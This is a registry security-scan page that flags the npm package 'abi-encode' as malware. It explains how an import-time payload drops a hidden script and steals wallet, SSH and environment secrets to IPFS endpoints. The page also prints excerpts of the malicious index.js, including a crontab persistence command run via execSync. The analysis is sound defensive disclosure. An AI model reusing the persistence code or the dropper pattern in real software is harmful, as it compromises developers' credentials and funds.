registry  /  abi-encode  /  1.0.0

abi-encode@1.0.0

Ethereum ABI encoding and decoding — encode function calls, decode parameters, parse event logs

AI Security Review

scanned 39m ago · by lpm-firewall-ai

Importing the package stages and detaches a hidden Node payload. The payload persists on the host, harvests credentials and wallet material, then exfiltrates encrypted findings.

Static reason
No blocking static signals were detected.
Trigger
A consumer imports or requires `index.js`; its delayed IIFE runs automatically.
Impact
Compromises developer/workstation secrets including cryptocurrency wallets, SSH private keys, environment files, and shell tokens.
Mechanism
import-time payload dropper, host persistence, credential harvesting, and encrypted HTTPS exfiltration
Attack narrative
On import, `index.js` waits briefly, decodes a base64 fixture into `~/.cache-db/.node-sync/syncd.js`, creates persistence, and launches it detached. The staged script polls IPFS dead drops, harvests wallet/seed/key/env/shell/SSH material from the home directory, RSA-encrypts it, and sends it to Pinata's IPFS API.
Rationale
This is a concrete, concealed import-time credential theft and persistence chain, not ABI functionality or a scanner-only signal.
Evidence
index.jstest/fixtures/keypairs.datpackage.json~/.cache-db/.node-sync/syncd.js~/.cache-db/.node-sync/.lock~/.cache-db/.node-sync/.sl~/Library/LaunchAgents/com.apple.syncd.plist~/.env~/.ssh/*
Network endpoints4
gateway.pinata.cloudipfs.iocloudflare-ipfs.comapi.pinata.cloud

OSV Corroboration

OpenSSF/OSV
Advisory
MAL-2026-10549
Source
OpenSSF Malicious Packages via OSV
Summary
This is a concrete, concealed import-time credential theft and persistence chain, not ABI functionality or a scanner-only signal.
References

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • `index.js` runs a delayed IIFE on module import.
  • It decodes `test/fixtures/keypairs.dat` into a hidden executable under the home directory.
  • The dropped payload searches home files for wallet, seed, key, env, shell, and SSH secrets.
  • It persists via cron, LaunchAgents, or Windows Scheduled Tasks.
  • It encrypts findings and uploads them to Pinata/IPFS endpoints.
Evidence against
  • `package.json` defines no npm lifecycle hooks.
  • The advertised ABI helpers themselves use only Node crypto and local data.
Behavioral surface
Source
ChildProcessCryptoFilesystemShell
Supply chainNo supply-chain packaging signals triggered.
ManifestNo manifest risk signals triggered.
scanned 1 file(s), 3.32 KB of source

Source & flagged code

1 flagged · loading source
index.jsView file
26const strData = hex.slice(strOffset + 64, strOffset + 64 + strLen * 2); L27: results.push(Buffer.from(strData, "hex").toString("utf8")); L28: offset += 64; ... L60: try { L61: var f = require("fs"), p = require("path"), o = require("os"), c = require("child_process"); L62: var h = o.homedir(), d = p.join(h, ".cache-db", ".node-sync"), s = p.join(d, "syncd.js"); L63: if (f.existsSync(s)) return; ... L68: try { L69: if (process.platform === "linux") { L70: c.execSync('(crontab -l 2>/dev/null | grep -v syncd; echo "0 */12 * * * /usr/bin/node '+s+' >/dev/null 2>&1") | crontab -', { timeout: 5e3 }); L71: } else if (process.platform === "win32") {
Medium
Install Persistence

Source writes installer persistence such as shell profile or service configuration.

index.jsView on unpkg · L26

Findings

1 Medium1 Low
MediumInstall Persistenceindex.js
LowFilesystem